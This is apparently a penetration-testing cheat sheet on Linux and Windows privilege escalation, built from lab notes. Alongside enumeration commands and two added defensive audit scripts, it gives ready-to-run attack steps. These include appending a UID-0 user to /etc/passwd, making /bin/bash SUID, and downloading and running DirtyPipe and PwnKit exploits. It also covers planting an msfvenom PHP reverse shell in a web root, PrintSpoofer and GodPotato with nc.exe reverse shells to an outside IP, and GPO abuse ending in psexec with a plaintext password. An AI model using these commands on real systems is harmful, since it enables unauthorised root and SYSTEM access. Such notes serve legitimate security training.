Privilege escalation

Situational Awareness

- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes

Linux

Automated tools

Manual enumeration

General enumeration

id
hostname
uname -a
cat /etc/issue
cat /etc/os-release
ifconfig -a
route
# netstat -anp
netstat -tulpn
# ss -anp
cat /etc/iptables/rules.v4
sudo -l
echo $PATH
(env || set) 2>/dev/null
dpkg -l
env

/etc/passwd

cat /etc/passwd

joe:x:1000:1000:joe,,,:/home/joe:/bin/bash # example output
- Login Name: "joe" - Indicates the username used for login.

- Encrypted Password: "x" - This field typically contains the hashed version of the user's password. In this case, the value x means that the entire password hash is contained in the /etc/shadow file.

- UID: "1000" - Aside from the root user, which always has UID 0, Linux starts counting regular user IDs from 1000. This value is also called the real user ID.

- GID: "1000" - Represents the user's specific Group ID.

- Comment: "joe,,," - This field generally contains a description about the user, often simply repeating username information.

- Home Folder: "/home/joe" - The user's home directory, which becomes the working directory upon login.

- Login Shell: "/bin/bash" - Indicates the default interactive shell, if one exists.

If /etc/passwd is writable -> for backwards compatibility, if a password hash is present in the second field of an /etc/passwd user record, it is considered valid for authentication and takes precedence over the corresponding entry in /etc/shadow, if one exists.

openssl passwd _PASSWORD_ # use OpenSSL to crypt the password

echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

su root2

-> the output of the openssl passwd command may vary depending on the system executing it. On older systems it may default to the DES algorithm, while on some newer systems it outputs an MD5-based hash ($1$ prefix -> md5crypt).
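An added audit check for the behaviour described above (not part of the original notes): it flags /etc/passwd records that carry a hash in the second field instead of the shadow placeholder, and UID-0 accounts other than root. The sample file is constructed; the root2 record is the one from the notes. Assumes POSIX sh and awk.

```sh
#!/bin/sh
# audit_passwd [FILE]: read /etc/passwd-style records (stdin if no FILE) and print
# one line per finding; returns 1 if anything was flagged, 0 if clean.
#   HASH-IN-PASSWD: field 2 is neither the shadow placeholder 'x', empty, nor a
#                   locked marker (! or *), so it is a usable hash that overrides /etc/shadow
#   EXTRA-UID0:     a UID-0 account whose login name is not root
audit_passwd() {
    awk -F: '
        NF == 0 { next }                                    # ignore blank lines
        NF != 7 { printf "MALFORMED line %d: %s\n", NR, $0; bad++; next }
        $2 != "x" && $2 != "" && $2 !~ /^[!*]/ {
            printf "HASH-IN-PASSWD user=%s line=%d\n", $1, NR; bad++
        }
        $3 == 0 && $1 != "root" {
            printf "EXTRA-UID0 user=%s line=%d\n", $1, NR; bad++
        }
        END { exit (bad > 0) }
    ' "$@"
}

# Constructed sample so the script runs stand-alone without reading the real file
sample=$(mktemp)
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
joe:x:1000:1000:joe,,,:/home/joe:/bin/bash
root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash
EOF
audit_passwd "$sample" || echo "findings present"
rm -f "$sample"
```

Run it against the real file with `audit_passwd /etc/passwd`; on a clean system it prints nothing and returns 0.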

Enumerating network interfaces, routes and open ports

ip a

-> check which networks the host is connected to

routel # or route

-> display network routing tables

ss -anp
netstat
netstat -tulpn

-> display active network connections and listening ports

iptables --help # must be root
cat /etc/iptables/rules.v4 # iptables-persistent package

-> inbound and outbound port filtering. On Linux-based systems, we must have root privileges to list firewall rules with iptables

Crontab

ls -lah /etc/cron*
crontab -l
grep "CRON" /var/log/syslog # cron log file

Frequent cron jobs (sample the process list for about a minute and count recurring commands)

for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;

Find writable directories

find / -writable -type d 2>/dev/null

Find files with SetUID capabilities

find / -perm -u=s -type f 2>/dev/null
grep Uid /proc/<process ID>/status # real and effective UID of a running process
chmod u+s <filename> # set the SUID bit on a file

-> when running an executable, it normally inherits the permissions of the user that runs it. However, if the SUID bit is set, the binary runs with the permissions of the file owner.

/usr/sbin/getcap -r / 2>/dev/null

-> Even though they seem similar, capabilities, setuid, and the setuid flag are located in different places within the Linux ELF file format.

Processes enumeration

watch -n 1 "ps aux | grep pass"

Enumerate mails

cat /var/mail/*

Disks

cat /etc/fstab
mount
lsblk
lsmod
/sbin/modinfo _MODULE_NAME_

-> once we have obtained a list of drivers and their versions, we are better positioned to search for relevant exploits

AppArmor

-> AppArmor is a kernel module that provides mandatory access control (MAC) on Linux systems by running various application-specific profiles, and it’s enabled by default on Debian 10.

sudo aa-status

Kernel vulnerabilities

cat /etc/issue
uname -r
arch

-> then search with searchsploit

DirtyPipe

wget http://<LHOST>/DirtyPipe-Checker/dpipe.sh
chmod +x dpipe.sh
./dpipe.sh

wget http://<LHOST>/DirtyPipe/compile.sh
wget http://<LHOST>/DirtyPipe/exploit-2.c
chmod +x compile.sh
./compile.sh
./exploit-2 /usr/bin/sudo

OR

wget http://<LHOST>/DirtyPipe/exploit-2
chmod +x exploit-2
./exploit-2 /usr/bin/sudo

-> Check docs for other ways: DirtyPipe

PwnKit

pkexec --version

-> if version <= 0.105 it is vulnerable

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit "id"
./PwnKit

Process that runs as root

Make a process that runs as root execute the command:

id;chmod u+s /bin/bash

Then privesc with:

ls -alh /bin/bash
/bin/bash -p -i 
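An added baseline check (not part of the original notes) that serves both the SUID enumeration above and the chmod u+s /bin/bash trick: snapshot the SUID files in a tree once, then report anything that appears later. The demo tree is constructed in a temporary directory; assumes POSIX sh with find, sort and comm.

```sh
#!/bin/sh
# suid_snapshot TREE        : sorted list of SUID regular files under TREE
# suid_new BASELINE TREE    : SUID files under TREE that are not in BASELINE
# suid_check BASELINE TREE  : returns 0 if nothing new, 1 if additions exist
suid_snapshot() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}
suid_new() {
    suid_snapshot "$2" | comm -13 "$1" -      # both inputs are sorted, as comm requires
}
suid_check() {
    [ -z "$(suid_new "$1" "$2")" ]
}

# Constructed demo in a temp directory; nothing touches the real system
demo=$(mktemp -d)
mkdir -p "$demo/usr/bin" "$demo/bin"
: > "$demo/usr/bin/passwd"; chmod 4755 "$demo/usr/bin/passwd"   # a legitimate SUID binary
suid_snapshot "$demo" > "$demo/baseline.txt"                    # record while the host is known-good
: > "$demo/bin/bash"; chmod 4755 "$demo/bin/bash"               # simulate a shell that was later made SUID
suid_new "$demo/baseline.txt" "$demo"                           # prints $demo/bin/bash
suid_check "$demo/baseline.txt" "$demo" || echo "new SUID file(s) detected"
rm -rf "$demo"
```

On a real host, store the baseline somewhere the audited system cannot modify, and run `suid_check` from cron or a monitoring agent.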

Capture traffic

sudo tcpdump -i lo -A | grep "pass"

-> tcpdump cannot be run without sudo permissions. That is because it needs to set up raw sockets in order to capture traffic, which is a privileged operation.

Windows

Manual enumeration

General enumeration

whoami
whoami /groups
  • hostname of the system -> infer the purpose and type of a machine (ex: WEB01, MSSQL01, …)
  • groups user is part of
powershell
PS > Get-LocalUser
PS > Get-LocalGroup # or net localgroup
PS > Get-LocalGroupMember _group_name_
PS > net user _username_
  • get users on the machine
  • which groups are active and which not
  • Remote Desktop Users
PS > systeminfo
  • OS exact version -> build number and review the existing versions of the identified operating system
  • architecture
PS > ipconfig /all
PS > route print
PS > netstat -ano
  • identify all network interfaces, routes, and active network connections
  • identify new services or even access to other networks
PS > Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# always check 32-bit and 64-bit Program Files directories located in C:\
# always check \Downloads of user
  • installed applications
PS > Get-Process
  • processes
PS > Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
  • get specific files anywhere in the system
PS > Get-History
PS > (Get-PSReadlineOption).HistorySavePath
PS > type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS > ls env:\
  • PS history
  • context (env variables)

Apache user reverse shell (check whoami /priv)

icacls C:\xampp\htdocs
msfvenom -p php/reverse_php LHOST=$LHOST LPORT=$LPORT -f raw > shell.php

add it to:

C:\xampp\htdocs\assets

Then visit the page to trigger the reverse shell and obtain access as the apache user! -> check whoami /priv, maybe there are some easily exploitable privileges for this user

Scheduled tasks

schtasks /query /fo LIST /v

Runas

runas /user:_username_ cmd

whoami /priv

Always check this command:

whoami /priv

If SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege is enabled, this is an easy vector for privilege escalation.

Printspoofer.exe

https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

Upload PrintSpoofer.exe and nc.exe.

.\PrintSpoofer.exe -c ".\nc.exe <IP> <PORT> -e cmd"
.\PrintSpoofer64.exe -i -c powershell.exe

GodPotato

.\godpotato4.exe -cmd "cmd /c .\nc.exe 192.168.45.207 1337 -e cmd.exe"

RogueWinRM

RogueWinRM.exe -p C:\windows\system32\cmd.exe

Icacls

icacls <EXECUTABLE FILE>

Useful commands

ls env:\

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

Automated enumeration

.\winPEAS.exe
iwr -uri http://_LHOST_/PowerUp.ps1 -Outfile PowerUp.ps1

powershell -ep bypass

. .\PowerUp.ps1 # check Hijacking file

PsExec

*Evil-WinRM* PS C:\tmp> ./powerview.ps1
*Evil-WinRM* PS C:\tmp> get-gpo -name "Default Domain Policy"

DisplayName      : Default Domain Policy
DomainName       : vault.offsec
Owner            : VAULT\Domain Admins
Id               : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 11/19/2021 12:50:33 AM
ModificationTime : 11/19/2021 2:00:32 AM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 4, SysVol Version: 4
WmiFilter        :

*Evil-WinRM* PS C:\tmp> Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh
Trustee     : anirudh
TrusteeType : User
Permission  : GpoEditDeleteModifySecurity
Inherited   : False

-> SharpGPOAbuse

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

Then we need to force a group policy refresh so the change is applied:

gpupdate /force

And then we use impacket-psexec to obtain NT AUTHORITY\SYSTEM:

impacket-psexec vault.offsec/anirudh:SecureHM@192.168.199.172

wmic qfe list

wmic qfe list

Each Microsoft Knowledge Base article bears an ID number, and patches are often referred to by their KB ID. Enumerate the installed KBs to find out whether patches are missing or obsolete → example: SMBGhost [[Billyboss - Walkthrough#Escalation#Installed Patches Enumeration]]

Useful resources

- HackTricks PE Linux
- g0tmi1k PE Linux
- swisskyrepo PE Linux

- HackTricks PE Windows
- ihsansencan PE Windows

General

Docker Container

The machine’s hostname suggests we are actually in a Docker container that we must first escape.

$ hostname
f8e1a236869d
$ mount

-> When a container is created with a tmpfs mount, the container can write files outside of the container’s writeable layer. As opposed to volumes and bind mounts, a tmpfs mount is temporary and only persists in the host’s memory.